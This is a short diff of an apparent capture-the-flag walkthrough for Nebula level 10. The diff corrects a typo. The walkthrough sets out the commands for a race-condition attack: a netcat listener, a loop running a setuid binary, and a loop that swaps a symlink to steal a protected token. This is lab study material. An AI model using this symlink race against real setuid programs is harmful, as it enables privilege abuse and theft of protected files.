gwynevans/bitesize/Nebula.md

 1. This is simply a network listener set to keep listening - `nc -lk 18211`
 2. This is process continuously loops trying to read a target - `while true; do ../flag10/flag10 target 127.0.0.1; done`
 3. While this process continuously swaps the target between pointing to an accessable file and the token file - `while true; do ln -sf dummy target; ln -sf ../flag10/token target; done`

-Quiet quickly, you should see the token on the console of process 1
+Quite quickly, you should see the token on the console of process 1...
 ```console
 .oO Oo.
 dummy